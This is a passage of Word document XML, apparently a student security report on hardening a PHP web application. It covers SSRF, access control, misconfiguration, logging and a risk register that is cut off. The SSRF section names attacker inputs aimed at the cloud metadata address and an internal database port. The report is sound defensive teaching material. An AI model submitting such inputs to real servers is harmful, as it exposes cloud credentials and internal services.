          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">An attacker could submit the cloud metadata address </w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(http://169.254.169.254/...) or an internal service address (http://127.0.0.1:3306/) and have the trusted server make that request on their behalf, reflecting the response back into the page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1127A02D" w14:textId="77777777" w:rsidR="001126E1" w:rsidRDefault="001126E1">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DECCCBF" w14:textId="31331E8C" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Remediation is layered in UrlGuard::isAllowed():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70777A40" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Scheme restric</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ted to https only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3299D24D" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Destination host must appear on an explicit allowlist (configured per deployment, not hardcoded).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5225A0EC" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The resolved IP address(es) for that host are re-checked against private, loopback, link-local and the cloud metadata address, which stops </w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>an allowlisted-looking hostname that has been re-pointed at an internal address (DNS rebinding).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089B6C7B" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The HTTP client is configured to never follow redirects (CURLOPT_FOLLOWLOCATION = false), so an allowlisted URL cannot 302-redirect the request elsewhere, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>a short timeout and response-size cap bound the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9D6FFE"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curl_setopt_array($ch, [</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    CURLOPT_FOLLOWLOCATION =&gt; false,</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    CURLOPT_PROTOCOLS      =&gt; CURLPROTO_HTTPS,</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    CURLOPT_TIMEOUT        =&gt; 3,</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    CURLOPT_MAXFILESIZE    =&gt; 65536,</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDE3DCA" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:t>5.4 Broken Acce</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:t>ss Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F5320C" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Finding: the admin area's only protection was hiding the navigation link for non-admin users; the admin pages themselves performed no server-side role check, so any authenticated student could reach /admin/index.php simply by typing the URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648DAAA8" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Rem</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ediation: every file under public/admin/ begins by calling Auth::requireAdmin(), which re-checks the session's role independently of the UI and logs a denial:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D8E6FE"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public static function requireAdmin(): array {</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    $user = self::requireLogin();</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    if ($user['</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>role'] !== 'admin') {</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        Logger::log('authorization_denied', $user['email'], Logger::clientIp(), ['required_role' =&gt; 'admin']);</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        http_response_code(403);</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        echo 'Forbidden';</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        exit;</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    return $user;</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012270B3" w14:textId="2C20B77B" w:rsidR="007B5C98" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The admin student</w:t>
      </w:r>
      <w:r w:rsidR="001126E1">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> feature also demonstrates the same SQL-injection remediation from Section 4.2 applied to a second query (LIKE-based search), since the vulnerable baseline built that query with the same string-concatenation pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700ADD1F" w14:textId="77777777" w:rsidR="001126E1" w:rsidRDefault="001126E1">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B57EF5C" w14:textId="77777777" w:rsidR="001126E1" w:rsidRDefault="001126E1">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D42B0C6" w14:textId="77777777" w:rsidR="001126E1" w:rsidRDefault="001126E1">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2127DB8D" w14:textId="77777777" w:rsidR="001126E1" w:rsidRDefault="001126E1">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="582B2172" w14:textId="77777777" w:rsidR="001126E1" w:rsidRDefault="001126E1">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17B59F43" w14:textId="77777777" w:rsidR="001126E1" w:rsidRDefault="001126E1">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2776C3BB" w14:textId="77777777" w:rsidR="001126E1" w:rsidRPr="00267CCC" w:rsidRDefault="001126E1">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="214A2F03" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:lastRenderedPageBreak/>
        <w:t>5.5 Security Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FA5178" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Th</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>e hardened application fails closed rather than open on configuration gaps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F144398" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>No secrets are hardcoded; all configuration is read from a .env file that is never committed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2771FC08" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>display_errors defaults to off and only turns on when APP_DEBUG=true is explicitly set</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — a missing .env file therefore does not accidentally enable verbose errors in production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADE8244" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A global security-headers middleware applies Content-Security-Policy, X-Content-Type-Options: nosniff, X-Frame-Options: DENY, Referrer-Policy: same-origin, Permissi</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ons-Policy, and (outside debug mode) Strict-Transport-Security to every response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25384FDC" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>File uploads are validated by sniffing actual file content (finfo) rather than trusting the client-supplied Content-Type or file extension, stored under a random filename out</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>side the web root, and capped at 5 MB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5C66A3" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:t>5.6 Security Event Logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDA727F" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Failed logins, account lockouts, denied authorization attempts, rejected input, CSRF rejections, and blocked SSRF attempts are all recorded through a single Logger::</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>log() call, written both to an append-only JSON-lines file (storage/logs/security.log) and mirrored into a security_events database table for SQL-based querying. The logger defensively strips any password/token/secret key before writing, so a caller mistak</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>e cannot leak a credential into the log:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6778EE"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private const REDACT_KEYS = ['password', 'password_confirm', 'token', 'raw_token', 'secret'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9739F8" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A sample of redacted log entries (fictitious data) is provided in docs/sample_logs/security.log.sample and discussed fur</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ther in Section 7.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A97D482" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:r w:rsidRPr="00267CCC">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC04AFA" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:lastRenderedPageBreak/>
        <w:t>6. Risk Register</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05094B2A" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Likelihood and Impact are each rated 1 (Low) to 3 (High); Risk Score = Likelihood × Impact. “Post” columns reflect the residual risk after the mitigations described in Sections 4 and 5 are applied.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100"/>
        <w:gridCol w:w="3200"/>
        <w:gridCol w:w="1100"/>
        <w:gridCol w:w="1600"/>
      </w:tblGrid>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="5705BE4D" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3D6D"/>
          </w:tcPr>
          <w:p w14:paraId="509544ED" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3D6D"/>
          </w:tcPr>
          <w:p w14:paraId="09821A8F" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3D6D"/>
          </w:tcPr>
          <w:p w14:paraId="5F4186FC" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Pre L×I</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3D6D"/>
          </w:tcPr>
          <w:p w14:paraId="6FE463BC" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Miti</w:t>
            </w:r>
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>gation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3D6D"/>
          </w:tcPr>
          <w:p w14:paraId="27D31C9C" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Post L×I</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3D6D"/>
          </w:tcPr>
          <w:p w14:paraId="68FD4324" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="35B6E805" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="12628457" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>R1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="687BB473" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SQL injection — auth bypass / data dump</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6CC69E7B" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
